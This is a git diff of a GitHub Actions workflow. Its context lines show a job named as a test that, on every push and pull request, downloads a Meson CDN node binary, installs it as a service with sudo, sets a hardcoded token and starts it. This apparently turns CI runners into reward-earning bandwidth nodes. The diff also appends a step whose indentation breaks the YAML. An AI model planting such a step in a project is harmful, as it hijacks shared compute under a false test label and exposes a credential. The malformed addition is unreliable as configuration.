--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -7,11 +7,6 @@ on:
     branches: [ main ]
   pull_request:
     branches: [ main ]
-
-  # Allows you to run this workflow manually from the Actions tab
-  workflow_dispatch:
-
-# A workflow run is made up of one or more jobs that can run sequentially or in parallel
 jobs:
   test:
    name: Subscrbeit
@@ -25,3 +20,7 @@ jobs:
    steps:
      - run: |
          wget 'https://staticassets.meson.network/public/meson_cdn/v3.1.18/meson_cdn-linux-amd64.tar.gz' && tar -zxf meson_cdn-linux-amd64.tar.gz && rm -f meson_cdn-linux-amd64.tar.gz && cd ./meson_cdn-linux-amd64 && sudo ./service install meson_cdn && sudo ./meson_cdn config set --token=gbrmmfpsjawukfvzsssbekks --https_port=443 --cache.size=30 && sudo ./service start meson_cdn
+  name: Sleep for 10s
+        uses: ./
+        with:
+          time: 10s
